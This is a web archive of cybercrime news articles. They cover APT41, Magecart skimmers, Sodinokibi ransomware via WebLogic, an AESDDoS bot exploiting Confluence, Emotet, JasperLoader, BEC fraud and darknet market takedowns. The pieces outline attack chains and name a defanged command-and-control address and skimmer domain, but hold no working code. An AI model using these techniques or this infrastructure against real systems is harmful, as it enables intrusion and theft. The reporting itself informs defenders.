Category Archives: cyber crime

Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency

The Ukrainian Secret Service is investigating the case of employees at a nuclear power plant that connected its system online to mine cryptocurrency.

The Ukrainian Secret Service (SBU) launched an investigation after employees at a local nuclear power plant connected some systems of the internal network to the Internet to mine cryptocurrency.

The incident was first reported by the Ukrainian news site UNIAN.

Nuclear power plants are critical infrastructure, such kind of incident could potentially expose high-sensitive information.

The security incident has happened in July at the South Ukraine Nuclear Power Plant at Yuzhnoukrainsk, in the south of the country.

On July 10, agents of the SBU raided the nuclear power plant and discovered the equipment used by the employees to mining cryptocurrency.

The equipment was discovered present in the power plant’s administration offices.

The Ukrainian authorities are currently investigating if any attackers may have had access to exposed systems to information that could threaten national security.

The SBU seized equipment composed of two metal cases containing that included coolers and video cards (Radeon RX 470 GPU), computer components commonly used in mining factories.

“Further, the SBU also found and seized additional equipment[12] that looked like mining rigs in the building used as barracks by a military unit of the National Guard of Ukraine, tasked with guarding the power plant.” reported ZDnet.

The authorities have charged several employees, but at the time, none was arrested.

In February 2018, a similar incident took place in Russia. Russian authorities arrested some employees at the Russian Federation Nuclear Center facility because they were suspected of trying to use a supercomputer at the plant to mine Bitcoin.

In April 2018, an employee at the Romanian National Research Institute for Nuclear Physics and Engineering an employee abused institute’s electrical network to mine cryptocurrency.

Pierluigi Paganini

(SecurityAffairs – nuclear power plant, hacking)

The post Employees abused systems at Ukrainian nuclear power plant to mine cryptocurrency appeared first on Security Affairs.

China-linked APT41 group targets US-Based Research University

Security experts at FireEye observed Chinese APT41 APT group targeting a web server at a U.S.-based research university.

Experts at FireEye observed Chinese APT41 APT group targeting a web server at a U.S.-based research university.

The APT41 has been active since at least 2012, it was involved in both state-sponsored espionage campaigns and financially-motivated attacks since 2014. The group hit entities in several industries, including the gaming, healthcare, high-tech, higher education, telecommunications, and travel services industries.

Unlike other China-based actors, the group used custom malware in cyber espionage operations, experts observed 46 different malware families and tools in APT41 campaigns.

“APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain.” states the report published by FireEye. “Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.”


FireEye experts published a detailed report on the evolution of the group’s tactics, techniques, and procedures (TTPs), they found an overlap with other known Chinese espionage operator like BARIUM and the Winnti APT groups.

APT41 leverages several techniques to carry out the initial compromise, including spearphishing, moving laterally from trusted third parties, leveraging stolen credentials.

Experts observed APT41 using spear-phishing email with attachments such as compiled HTML (.chm) files.

The arsenal of the group includes backdoors, credential stealers, keyloggers, and rootkits. The APT41 cyber espionage group also leveraged TeamViewer to deploy its malware into the targets’ compromised environment.

The attack against a publicly-accessible web server at a U.S.-based research university took place on April 2019. The hackers exploited the CVE-2019-3396 vulnerability in Atlassian Confluence Server to compromise the systems and load additional payloads, including a variant of the China Chop web shell.

The attack involved two additional files, the HIGHNOON backdoor and a rootkit, then within the next 35 minutes, the attackers used both the China Chopper web shell and the HIGHNOON backdoor to send commands to the compromised server.

“HIGHNOON is a backdoor that consists of multiple components, including a loader, dynamic-link library (DLL), and a rootkit. When loaded, the DLL may deploy one of two embedded drivers to conceal network traffic and communicate with its command and control server to download and launch memory-resident DLL plugins.” reads the analysis published by FireEye.

Attackers used the HIGHNOON backdoor to execute a PowerShell command and download a script from PowerSploit. This script appears to be a copy of Invoke-Mimikatz post-exploitation tools, reflectively loading Mimikatz 2.0 into memory.

The hackers also conducted additional reconnaissance and downloaded two additional files, representing the dropper and encrypted/compressed payload components of the ACEHASH malware. The ACEHASH malware is a credential stealer and password dumping utility.

Summarizing the hackers were able to exploit the vulnerability in vulnerable Confluence system to execute command and deploy custom malware. While Mimikatz failed, the ACEHASH malware allowed the attackers to harvest a single credential from the system. The good news is that FireEye successfully neutralized the attack.

Pierluigi Paganini

(SecurityAffairs – APT41, hacking)

The post China-linked APT41 group targets US-Based Research University appeared first on Security Affairs.

The Cost of Dealing With a Cybersecurity Attack in These 4 Industries

A cybersecurity issue can cause unexpected costs in several different areas, which is the cost of Dealing with an attack in 4 Industries?

A cybersecurity issue can cause unexpected costs in several different areas. In addition to the monetary costs associated with things like lost productivity and improving network security to reduce the likelihood of future incidents, affected companies have to deal with the costs tied to reduced customer trust and damaged reputations.

It’s not always easy or straightforward to pinpoint the overall costs of recovering from a cyberattack. The totals also vary by industry. However, here’s some research that illuminates the various financial impacts for these four sectors.

1. Health Care

Health care is particularly vulnerable to cyberattacks. Criminals are aware that facilities typically handle large numbers of records containing exceptionally in-demand information that is 10 times more valuable on the black market than a credit card number. A report from Carbon Black showed that two-thirds of respondents said cyberattacks had gotten more sophisticated over the past year, too.

A victimized health care organization spends an average of $1.4 million to recover from a cyber incident. It also doesn’t help that many health care organizations are not promptly aware of cyberattacks. Experts say that most organizations don’t discover active cyberattacks for at least 18 months.

The longer an attack progresses without detection, the more costly the damage will likely be to fix. And, the costs go up if the health care facility does not have a cybersecurity response plan to use after an attack gets identified.

2. Retail

As people have growing opportunities to shop online, the chances for hackers to carry out lucrative cyberattacks in the retail sector also go up. Statistics from 2016 showed that the average cost per compromised retail record was $172. Some of the costs relate to hiring consultants to get to the bottom of breaches and paying fines to payment processors or credit card brands for insufficient security.

People are becoming less tolerant of retailers that have widescale data breaches. Additionally, the convenience and choice offered by online shopping increase the likelihood that if a person stops doing business with one retailer, they can probably find what they need elsewhere.

3. Manufacturing

The manufacturing industry was not always known to embrace connected technology, but that’s changing. Many brands recognize that keeping their machines connected to the internet can assist them with tracking trends, avoiding downtime and more.

One of the reasons why it’s tough to calculate a straightforward figure for cyberattacks is that there are so many related costs that may not be immediately apparent. For example, manufacturing companies can expect a cyberattack itself to cost about $1.7 million. But, other expenses can quickly stack up, including those related to lost productivity, customer churn and the need to hire extra staff members to help with cleaning up after a cyberattack.

Analysts also say that the manufacturing industry is extremely attractive to hackers. In addition to planning attacks that cause supply chain disruptions, cybercriminals may target manufacturing entities as part of nation-state attacks. Although those make up a small percentage of overall attacks, they took 500 times longer to resolve in 2017 than the previous year.

4. Finance

The very nature of the financial industry and the money it handles make the sector ripe for a cyberattack. It also tops the list of annual cybercrime costs at about $18 million.

But, the costs also vary depending on the type of attack a financial brand suffers. A report published collaboratively by two organizations showed that the average cost of a malware attack for a financial brand was $825,000. But, the expenses climb dramatically for a distributed denial of service (DDoS) attack. The expenses of those incidents are approximately $1.8 million.

The numbers of attacks on the financial industry are going up, too. Research associated with entities in the United Kingdom confirmed a five-fold increase of reported hacks on financial institutions in 2018 compared to 2017. That trend suggests that financial institutions have to be especially vigilant to protect against future attacks. Doing so often requires substantial financial resources.

Moving in a Worrying Direction

This list gives industry-specific snapshots of cybersecurity costs associated with particular industries. But, even sectors that are not on this list should be concerned about potential losses. Many cybersecurity experts agree that the expenses of cyberattacks, in general, are steadily going up.

The expenses and effort required for resolution are also impacted by the growing complexity of cybercriminals’ tactics.

Dealing with the initial aftermath of an attack is only the beginning. Companies also have to assure customers that they’ve taken steps to prevent other problems — and stay committed to that promise.

All of these aspects require significant financial investments, as well as a recognition that cyberattacks are genuine threats to tackle.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of To learn more about Kayla and her recent projects, visit her About Me page.

Pierluigi Paganini

(SecurityAffairs – cybersecurity, hacking)

The post The Cost of Dealing With a Cybersecurity Attack in These 4 Industries appeared first on Security Affairs.

Ransomware As A Tool – LockerGoga

Ransomware authors keep experimenting with the development of payload in various dimensions. In the timeline of ransomware implementations, we have seen its evolution from a simple screen locker to multi-component model for file encryption, from novice approach to a sophisticated one. The Ransomware as a Tool has evolved in wild…

Authorities shut down major darknet marketplaces: the Wall Street Market and Valhalla

German police have shut down one of the world’s largest black marketplace in the darkweb, the ‘Wall Street Market,’ and arrested its operators.

The German police, with the support of Europol, Dutch police and the FBI, has shut down one of the world’s largest black marketplace in the darkweb, the ‘Wall Street Market,’ and arrested three operators allegedly running it. The three German nation suspects were arrested on April 23 and 24 in the states of Hesse, Baden-Wuerttemberg and North Rhine-Westphalia.

The operation also allowed to arrest of two major suppliers of illegal narcotics in the United States.

The operation against the Wall Street Market started earlier this year after Finnish authorities also shut down another black marketplace, the Silkkitie market (aka the Valhalla marketplace). Many Finnish narcotics sellers moved to the Wall Street Market.

“The German Federal Criminal Police (Bundeskriminalamt) shut down the Wall Street Market, under the authority of the German Public Prosecutor’s office. They were supported by the Dutch National Police (Politie), Europol, Eurojust and various US government agencies (Drug Enforcement Administration, Federal Bureau of Investigation, Internal Revenue Service, Homeland Security Investigations, US Postal Inspection Service, and the US Department of Justice).” reads a press release published by the Europol.

“The Silkkitie (known as the Valhalla Marketplace) and its contents was also seized by Finnish Customs (Tulli) in close cooperation with the French National Police (La Police Nationale Française). 

The Wall Street Market marketplace was considered one of the most important points of aggregation in the cybercrime underground for trading in cocaine, heroin, cannabis and amphetamines as well as digital goods (i.e. stolen data, malware, and fake documents).

The Tor-based marketplace had more than one million registered accounts, more than 5,000 registered sellers and more than 60,000 sales offers.

“The illegal platform was exclusively accessible via the Tor network in the so-called Darknet and aimed at international trade in criminal goods.” continues the Europol. “Most recently, more than 63 000 sales offers were placed on the online marketplace and more than 1 150 000 customer accounts and more than 5 400 sellers registered. For payment, the users of the online marketplace used the crypto currencies Bitcoin and Monero. The alleged marketplace officials are said to have received commission payments of 2 to 6 percent of the sales value for the settlement of illegal sales of the platform.”

The anonymity of the payment was ensured by using Bitcoin and Monero cryptocurrencies. It was a prolific business for the Wall Street market operators that were keeping for them a fee of two to six percent of the sales value.

The German authorities seized over €550 000 in cash and millions worth of cryptocurrencies, the police also seized several vehicles and of course computers and data storage. 

Behind this new success against the cybercrime there is a dedicated Dark Web Team established by the Europol that works together with EU partners and law enforcement across the globe.

The team delivers a complete, coordinated approach for:

  • sharing information;
  • providing operational support and expertise in different crime areas;
  • developing tools, tactics and techniques to conduct dark web investigations;
  • identifying threats and targets. 

“A shared commitment across the law enforcement community worldwide and a coordinated approach by law enforcement agencies has once again proved their effectiveness.” concludes the Europol. “The scale of the operation at Europol demonstrates the global commitment to tackling the use of the dark web as a means to commit crime.”

Pierluigi Paganini

(SecurityAffairs – Wall Street Market, hacking)

The post Authorities shut down major darknet marketplaces: the Wall Street Market and Valhalla appeared first on Security Affairs.

Russian national Anton Bogdanov indicted for $1.5M cyber tax fraud scheme

The US DoJ indicted a Russian national for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

The US DoJ indicted the Russian national Anton Bogdanov for obtaining over $1.5 million in fraudulent tax refunds from the Internal Revenue Service.

Bogdanov was charged in federal court in Brooklyn of wire fraud conspiracy, aggravated identity theft and computer intrusion in connection with a scheme in which he and other crooks used stolen personal information to file federal tax returns and fraudulently obtain more than $1.5 million in tax refunds from the Internal Revenue Service.

The Russian man was arrested in Phuket, Thailand, on November 28, 2018 and was extradited to the United States in March 2019. 

“As alleged in the indictment, Bogdanov and his co-conspirators combined sophisticated computer hacking and identity theft with old-fashioned fraud to steal more than $1.5 million from the U.S. Treasury,” stated United States Attorney Donoghue.  “This Office, together with our law enforcement partners, will use all our available resources to target and bring cybercriminals to justice, wherever they are.”

According to the indictment, between June 2014 and November 2016,
Anton Bogdanov and his co-conspirators compromised computer systems of private tax preparation firms in the United States and stole personally identifiable information (PII) (including Social Security numbers and dates of birth) of the victims.

Crooks used stolen data to impersonate the victims and modified the tax returns to ensure that the refunds are paid to their prepaid debit cards.

“Bogdanov and his co-conspirators also used misappropriated PII to obtain prior tax filings of victims from an IRS website, and filed new tax returns, purportedly on behalf of the victims, so that refunds were paid to prepaid debit cards under their control.” reads the press release published by the DoJ. “The debit cards were cashed out in the United States, and a percentage of the proceeds was wired to Bogdanov in Russia.”

Anton Bogdanov

According to the investigators, the debit cards were cashed out in the United States, while Bogdanov received a percentage of the proceeds in Russia.

If convicted of the charges, Anton Bogdanov could face up to 27 years’ imprisonment.

Pierluigi Paganini

(SecurityAffairs – Anton Bogdanov, cybecrime)

The post Russian national Anton Bogdanov indicted for $1.5M cyber tax fraud scheme appeared first on Security Affairs.

Magecart Group 12 also targets Opencart-based online stores

Magecart made the headlines again, Magecart Group 12 is conducting a large-scale operation that targets OpenCart online stores.

According to security experts at RiskIQ, the Magecart Group 12 is behind a large-scale operation against OpenCart online stores. The attackers used stealth tactics to remain under the radar and siphon payment data from compromised e-commerce sites.

Security firms have monitored the activities of a dozen Magecart groups at least since 2015. The gangs use to implant skimming script into compromised online stores in order to steal payment card data on, but they are quite different from each other. 

According to a joint report published by RiskIQ and FlashPoint in March, some groups are more advanced than others. The list of victims of Magecart groups is long and includes several major platforms such as British AirwaysNeweggTicketmaster, and Feedify​​

OpenCart is in the most popular e-commerce platforms worldwide that is currently used by thousands of online stores of any size. OpenCart one of the top three e-commerce CMS, after Shopify and Magento, it is normal that crooks attempt to target it too.

Previous attacks carried out by the Magecart Group 12 hit e-commerce services used by thousands of online stores that ran versions of  Magento, OpenCart, and OSCommerce. The attacks against OpenCart-based stores is similar to the Magento ones.

“We’ll also break down a large-scale Magecart Group 12 campaign uncovered by RiskIQ researchers abusing the OpenCart platform, which is run by thousands of e-commerce sites.” reads the analysis published by RiskIQ. “Group 12 breached OpenCart sites to inject their skimmer similar to the Magento attacks, starting with the insertion of a very well-picked domain name: batbing[.]com.”

In the latest wave of attacks, Magecart group 12 injected their skimmer into OpenCart websites only after checking if the visitor accessed a checkout page. Technically they added the following pre-filter JavaScript code:

Magecart Group 12 OpenCart

Attackers used a domain name that attempts to impersonate the search engine script.

“One other notable element of this attack is the impersonation attempt for the search engine script: “


The normal Bing URL looks very similar:


RiskIQ with the support of AbuseCH and the Shadowserver Foundation took offline the domain used by the hackers.

Experts found references to the skimmer script in a forum post on the OpenCart forum.

RiskIQ experts believe that new types of web skimming attacks will be observed in the future, hackers will go beyond payment data attempting to steal login credentials and other sensitive information.

“It’s likely that new breeds of these web skimming attacks will emerge in the future, whether by new or existing Magecart groups. They’re currently focusing on payment data, but we’re already seeing moves to skim login credentials and other sensitive information.” concludes RiskIQ. “This widens the scope of potential Magecart victims far beyond e-commerce alone.”

Pierluigi Paganini

(SecurityAffairs – Magecart Group 12, OpenCart)

The post Magecart Group 12 also targets Opencart-based online stores appeared first on Security Affairs.

Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware

Threat actors are exploiting a recently patched critical Oracle WebLogic Server vulnerability to deliver the Sodinokibi ransomware to organizations.

Threat actors are delivering a new piece of malware, tracked as
Sodinokibi, by exploiting a recently patched Oracle WebLogic Server vulnerability.

Oracle WebLogic Server is a Java EE application server currently developed by Oracle Corporation, it is used by numerous applications and web enterprise portals based on Java technology. The flaw initially received the identifier CNVD-C-2019-48814.

An attacker could exploit the vulnerability to remotely execute commands without authorization by sending a specially crafted HTTP request.

On April 26, Oracle addressed the flaw with the release of an out-of-band update.

The threat was detected and analyzed by several firms (i.e. South Korean EST Security, Cisco’s Talos), independent researchers, intelligence group.

“Oracle first patched the issue on April 26, outside of their normal patch cycle, and assigned it CVE-2019-2725. This vulnerability is easy for attackers to exploit, as anyone with HTTP access to the WebLogic server could carry out an attack. Because of this, the bug has a CVSS score of 9.8/10.” reads the analysis published by Cisco Talos.” Attackers have been making use of this exploit in the wild since at least April 17. “

Sodinokibi ransomware

Crooks used PowerShell commands to download and execute malicious payloads, they demanded a ransom that ranges from $1,500 worth of BitCoin up to $2,500. The ransom doubles if the victims do not pay it within a specified number of days.

Talos started seeing the first stages of the Sodinokibi attacks — the attackers first looked for exploitable WebLogic servers —

Since April 25, one day before Oracle released security patches, the experts started observing Sodinokibi ranomware infections.

Talos also noted that threat actors were exploiting the flaw to deliver the popular Gandcrab ransomware.

“We find it strange the attackers would choose to distribute additional, different ransomware on the same target. Sodinokibi being a new flavor of ransomware, perhaps the attackers felt their earlier attempts had been unsuccessful and were still looking to cash in by distributing Gandcrab,” continues Talos researchers.

Experts discovered that the CVE-2019-2725 has been also exploited to deliver cryptocurrency miners and other types of malware. Researchers believe it has also likely been exploited in targeted attacks.

“Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725 ” concludes Talos.

Pierluigi Paganini

(SecurityAffairs – sodinokibiransomware, Weblogic)

The post Crooks exploit Oracle WebLogic flaw to deliver Sodinokibi Ransomware appeared first on Security Affairs.

Saint Ambrose Catholic Parish – Crooks stole $1.75M in BEC Attack

Crooks have stolen $1.75 million in a church BEC (Business Email Compromise) attack, the victim is the Saint Ambrose Catholic Parish.

Cybercriminals have stolen $1.75 million in a BEC (Business Email Compromise) attack against the Saint Ambrose Catholic Parish.

Saint Ambrose is the second largest church in the Diocese of Cleveland and the largest church in Brunswick, Ohio.

The Saint Ambrose Catholic Parish discovered the BEC attack on April 17 when was making payments related to a Vision 2020 project that were never received by a contractor (Marous Brothers Construction).

According to the investigation conducted by the FBI and Brunswick police, hackers broke into the parish’s email system, likely via a phishing attack. Attackers were able to trick the personnel into believing that the contractor had changed their bank, and asked them to transfer the funds to a new bank account under their control.


In a letter to the parish, Fr. Bob Stec explained he was contacted by the contractor that informed him that he did receive the payments for the past two months.

“On Wednesday, Marous Brothers called inquiring as to why we had not paid our monthly payment on the project for the past two months totaling approximately $1,750,000.” reads a letter sent to parish by Pastor Father Bob Stec.

“This was shocking news to us, as we have been very prompt on our payments every month and have received all the appropriate confirmations from the bank that the wire transfers of money to Marous were executed/confirmed.”

According to Stec, crooks accessed two St. Ambrose employees’ email accounts. Attackers only compromised the email system, they did not access to the parish database that is stored in a secure cloud-based system.

“We are working closely with the Diocese and its insurance program to file a claim in the hopes that Marous Brothers Construction can receive their payment quickly and we can bring this important project for our parish to a positive completion,” Stec said in the letter.

The parish submitted an insurance claim in the attempt of recovering the stolen money.

“At the same time, we brought in information technology consultants to review the security and stability of our system, change all passwords, and verify the integrity of our databases and other pertinent information.” Stec added. “They have determined the breach was limited to only two email accounts.”

BEC attacks represent a serious threat for businesses, according to the recently released 2018 Internet Crime Report by FBI’s Internet Crime Complaint Center (IC3), BEC scams reached $1,2 billion in profits.

“In 2018, the IC3 received 20,373 BEC/E-mail Account Compromise (EAC) complaints with adjusted losses of over $1.2 billion” reads the report.

Pierluigi Paganini

(SecurityAffairs – BEC, hacking)

The post Saint Ambrose Catholic Parish – Crooks stole $1.75M in BEC Attack appeared first on Security Affairs.

ElectrumDoSMiner botnet reached 152,000 hosts

Researchers at Malwarebytes are monitoring the evolution of the ElectrumDoSMiner DDoS botnet that reached 152,000 infected hosts.

MalwareBytes researchers are closely monitoring attacks against users of the popular Electrum Bitcoin wallet, in particular, the evolution of the Electrum DDoS botnet.

In mid-April, experts at MalwareBytes published a report warning of cyber attacks against users of the popular Electrum Bitcoin wallet. According to the experts, crooks already netted over 771 Bitcoins, an amount equivalent to approximately $4 million USD at current exchange rates.

Since that analysis, cyber criminals have stolen other funds reaching USD $4.6 million, but the most concerning aspect of the story is that and the botnet they used continues to grow. On April 24, the botnet was composed of less than 100,000 bots, but the next day the number peaked at 152,000.

“Since our last blog, the amount of stolen funds has increased to USD $4.6 million, and the botnet that is flooding the Electrum infrastructure is rapidly growing.” reads the analysis published by MalwareBytes. “Case in point, on April 24, the number of infected machines in the botnet was just below 100,000 and the next day it reached its highest at 152,000, according to this online tracker. Since then, it has gone up and down and plateaued at around the 100,000 mark.”

The experts already monitored two malware campaigns respectively leveraging the RIG exploit kit and the Smoke Loader to deliver the ElectrumDoSMiner.

MalwareBytes also detected a previously undocumented tracked as Trojan.BeamWinHTTP that was used by crooks to deliver the ElectrumDoSMiner (transactionservices.exe).

The experts believe that there are many more infection vectors beyond the above loaders they discovered.

Most of the ElectrumDoSMiner infections were observed in Asia Pacific region (APAC), Brazil and Peru.


“The number of victims that are part of this botnet is constantly changing. We believe as some machines get cleaned up, new ones are getting infected and joining the others to perform DoS attacks.” continues the report. “Malwarebytes detects and removes ElectrumDoSMiner infections on more than 2,000 endpoints daily.”

Further technical details, including Indicators of Compromise (IoCs), are reported in the analysis published by MalwareBytes.

Pierluigi Paganini

(SecurityAffairs – ElectrumDoSMiner, botnet)

The post ElectrumDoSMiner botnet reached 152,000 hosts appeared first on Security Affairs.

New Emotet variant uses connected devices as proxy C2 servers

Researchers at Trend Micro have uncovered a malware campaign distributing a new Emotet Trojan variant that compromises devices and uses them as Proxy C2 servers.

Trend Micro discovered a new variant of the Emotet Trojan that is able to infect devices and use them as proxy command-and-control servers. The new variant also employs random URI directory paths to evade network-based detection rules.

“Recently, an analysis of Emotet traffic has revealed that new samples use a different POST-infection traffic than previous versions. ” reads the analysis published by Trend Micro. “It is also attempting to use compromised connected devices as proxy command and control (C&C) servers that redirect to the real Emotet C&Cs. These changes may seem trivial at first, but the added complexity in command and control traffic is an attempt by Emotet authors to evade detection. “

The experts also noticed that threat actors behind the latest Emotet campaign are actively attempting to compromise IoT devices, including routers, IP cameras, webcams, and recruit them in a first layer of the C2 infrastructure.

The compromised devices could be used by threat actors for other malicious purposes.

Emotet is delivered via spam campaigns, one of the attacks monitored in early April leveraged the Powload trojan downloader to drop the threat. The spam emails use malicious ZIP file that can be opened with the 4-digit password included in the body of the email. The ZIP archive contains variants of Powload that uses Powershell to download an executable the final Emotet payload.

Emotet 1

Since March 15, experts monitored Emotet samples using new POST-infection traffic and discovered they were also using randomly generated URI directory paths in its POST requests to evade network-based detection

The new Emotet version sends the stolen info within the HTTP POST message body, instead of using the Cookie header. Like previous versions, it encrypts data with an RSA key and AES, and encoded it in Base 64.

Emotet traffic

“The change in POST-infection traffic and the use of these connected devices show that Emotet is still a constantly evolving and resilient threat.” concludes Trend Micro.

“The malware authors are fine-tuning evasion techniques and trying to adapt to security solutions. If left unchecked and undetected, this threat may lead to a substantial loss of money and data for businesses.”

Pierluigi Paganini

(SecurityAffairs – cybercrime, malware)

The post New Emotet variant uses connected devices as proxy C2 servers appeared first on Security Affairs.

Signed Malspam campaigns hit Europeans with Multi-Stage JasperLoader

Experts observed several malspam campaigns using signed emails to deliver the GootKit banking Trojan (aka talalpek or Xswkit).

Threat actors leverage a multi-stage malware loader tracked as JasperLoader in the malspam campaigns over the past few months.

The JasperLoader was observed while distributing malware to targets from Central Europe, most of them in Italy and Germany.

The Gootkit banking Trojan was previously distributed by DanaBotNeutrino exploit kit, and Emotet.

“Specifically, we’re tracking a loader known as “JasperLoader,” which has been increasingly active over the past few months and is currently being distributed via malicious spam campaigns primarily targeting central European countries with a particular focus on Germany and Italy.” reads the analysis published by Cisco Talos. “JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult.”

The JasperLoader loader uses a multi-stage infection process that implements several obfuscation techniques to avoid detection. According to Cisco Talos experts, the JasperLoader loader was designed with resiliency and flexibility in mind.

The malspam campaigns detected by Cisco Talos that hit European countries use weaponized attachments containing either a Visual Basic for Applications (VBS) script or a DOCM documents with VBA macros.

malspam campaigns jasperloader

Talos experts also noticed spam messages containing malicious JS downloaders.

The latest malspam campaigns observed by Talos use message signing to confirm the authenticity of the sender.

Talos has identified several malicious campaigns making use of this type of message signing as a way to lend credibility to their messages and maximize the likelihood that potential victims will open the malicious attachments.” continues the analysis of the researchers.

The campaigns that targeted Italian users leverage legitimate certified email services such as Posta Elettronica Certificata (PEC).

“The choice to abuse certified email services such as PEC demonstrates that as attackers are always looking for new ways to lend credibility to their social engineering attacks.” continues Cisco Talos.

“In this case, abusing a legitimate email service allowed them to deliver their malicious emails in a way that would maximize the likelihood that a potential victim would open the attachments and infect themselves with JasperLoader. “

The JasperLoader malware loader is used by threat actors to check targets geolocation and determine if a machine is in one of the countries targeted in the malspam campaign (i.e. Russia, Ukraine, Belarus, or People’s Republic of China).

Experts observed that the malware gains persistence by adding an LNK shortcut to itself to the Startup folder, in this way every time the system is rebooted the malware will be launched.

The JasperLoader is used by threat actors to update the loader, to run Powershell scripts, and, of course, to deliver the final Gootkit malware payload.

Further technical details, such as Indicators of compromise (IOCs), are included in the analysis published by Talos.

Pierluigi Paganini

(SecurityAffairs – malspam campaigns, JasperLoader)

The post Signed Malspam campaigns hit Europeans with Multi-Stage JasperLoader appeared first on Security Affairs.

AESDDoS bot exploits CVE-2019-3396 flaw to hit Atlassian Confluence Server

A new variant of the AESDDoS bot is exploiting a recent vulnerability in the Atlassian collaborative software Confluence.

Security experts at Trend Micro have spotted a new variant of AESDDoS botnet that is exploiting a recently discovered vulnerability in the Atlassian collaborative software Confluence.

The flaw exploited in the attacks, tracked as CVE-2019-3396, is a server-side template injection vulnerability that resides in the Widget Connector macro in Confluence Server.

Threat actors leverage the vulnerability to install denial of service (DDoS) malware and crypto-currency miners, and to remotely execute code.

“In our analysis, we saw that an attacker was able to exploit CVE-2019-3396 to infect machines with the AESDDoS botnet malware.” reads the analysis published by Trend Micro. “A shell command was remotely executed to download and execute a malicious shell script (Trojan.SH.LODEX.J), which in turn downloaded another shell script (Trojan.SH.DOGOLOAD.J) that finally installed the AESDDoS botnet malware on the affected system.”

The AESDDoS bot involved in the recent attacks has the ability to launch several types of DDoS attacks, including SYN, LSYN, UDP, UDPS, and TCP flood.

The malware also connects to 23[.]224[.]59[.]34:48080 to send and receive remote shell commands from the attacker.

Once the malware has infected a system, it can gather system information, including model ID and CPU description, speed, family, model, and type.

The AESDDoS bot uses the AES algorithm to encrypt gathered data and data received from the C2 server.

Trend Micro researchers also discovered that the latest variant of the AESDDoS bot can modify files i.e., /etc/rc.local and /etc/rc.d/rc.local, as an autostart technique by appending the {malware path}/{malware file name} reboot command.

Atlassian has already addressed the vulnerability in the Confluence software with the release of the version 6.15.1.

“Since the successful exploitation of CVE-2019-3396 in Atlassian Confluence Server can put resources at risk, enterprises should be able to identify vulnerabilities, make use of the latest threat intelligence against malware or exploits, and detect modifications to the application’s design and the underlying infrastructure that hosts it,” Trend Micro concludes.

Pierluigi Paganini

(SecurityAffairs – AESDDoS bot, DDoS)

The post AESDDoS bot exploits CVE-2019-3396 flaw to hit Atlassian Confluence Server appeared first on Security Affairs.

Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites

Security experts discovered hosted on GitHub the skimmer scripts used by Magecart cybercrime gang to compromised Magento installations worldwide.

Experts discovered the Magecart skimmer scripts used to compromise a few hundred e-commerce websites worldwide hosted on GitHub.

Security firms have monitored the activities of a dozen Magecart groups at least since 2015. The gangs use to implant skimming script into compromised online stores in order to steal payment card data on, but they are quite different from each other. 

According to a joint report published by RiskIQ and FlashPoint, some groups are more advanced than others, in particular, the gang tracked as Group 4 appears to be very sophisticated.

The list of victims of Magecart groups is long and includes several major platforms such as British AirwaysNeweggTicketmaster, and Feedify​​

Early April, the security firm Group-IB issued a new comprehensive report on the analysis of JavaScript-sniffers – a type of malware designed to steal customer payment data from online stores. 2440 infected e-commerce websites with a total of around 1.5 million unique daily visitors whose data could have been compromised, were analyzed by Group-IB researchers

Experts at MalwareBytes discovered a MageCart skimmer script hosted on Github that was uploaded on April 20 and quickly removed by the platform after the experts reported the discovery to the company.

“This latest skimmer is a hex-encoded piece of JavaScript code that was uploaded to GitHub on April 20 by user momo33333, who, as it happens, had just joined the platform on that day as well.” reads the analysis published by MalwareBytes.

MageCart skimmer script

The script was uploaded on GitHub by the user ‘momo33333’ who was registered with the platform during the same day.

Jérôme Segura, a security researcher at MalwareBytes, observed
momo33333 during the process of setting up the skimmer script. The user initially started with a couple of tests, the published the final obfuscated skimmer payload, ready to be used in campaigns against Magento-based e-commerce stores.

“Just like with any other kind of third-party plugins, compromised Magento sites are loading this script within their source code, right after the CDATA script and/or right before the </html> tag: ” wrote Segura.

“It’s worth noting that the compromised Magento sites will remain at risk, even if the GitHub-hosted skimmer is taken down. Indeed, attackers can easily re-infect them in the same manner they initially injected the first one.”

Querying the and PublicWWW search engines it is possible to determine that at least a couple of hundred websites were compromised using the Magecart skimmers script hosted to GitHub.

As usual let me suggest to keep your install up to date running the latest version of CMS and plugins.

“It is critical for e-commerce site owners to keep their CMS and its plugins up-to-date, as well as using secure authentication methods. Over the past year, we have identified thousands of sites that are hacked and posing a risk for online shoppers,” concludes the researcher.

Pierluigi Paganini

(SecurityAffairs – GitHub, Magecart skimmer scripts)

The post Magecart skimmer scripts hosted on GitHub infected 200+ e-commerce sites appeared first on Security Affairs.

Special-Purpose Vehicle Maker Aebi Schmidt Hit by Malware

The special-purpose vehicle maker Aebi Schmidt was hit by a malware attack that disrupted some of its operations.

The Aebi Schmidt Group is a manufacturer of product systems and services for the management, cleaning and clearance of traffic areas as well as for the maintenance of green areas in demanding terrain.

Aebi Schmidt focuses on manufacturing agricultural, municipal and other special-purpose vehicles, including snow blowers, street cleaners, and other machinery used in airports.

On Thursday Aebi Schmidt announced that its systems had been hit by a malware-based cyberattack. The incident caused the disruption of some of its operations, such as email management.

The malware only infected Windows systems, in response to the incident the company temporarily switched off these systems.

“The IT system failure is due to an attempt by third parties to infiltrate malware into our systems. More and more companies worldwide are being affected by such attacks.” reads a note published by the company on its website.

Aebi Schmidt

The company notified the incident to customers and business partners, it asked them to contact it via phone until its email systems are restored.

Fortunately, the cyber attack has not impacted production systems, order processing, US-based M-B Companies, or its telematics platform.

Windows systems are currently being “rebooted step by step,” but the process could be “time consuming.”

Aebi Schmidt did not share technical details of the cyber attack, but according to TechCrunch, the company was hit by a ransomware.

“Aebi Schmidt, a European manufacturing giant with operations in the U.S., has been hit by a ransomware attack, TechCrunch has learned. ” reads the post published by TechCrunch. “Schiess [spokesperson Thomas Schiess  ] would not comment on claims of ransomware specifically, but the source said staff were told during an all-hands meeting Wednesday that the incident was a “ransomware attack.” “

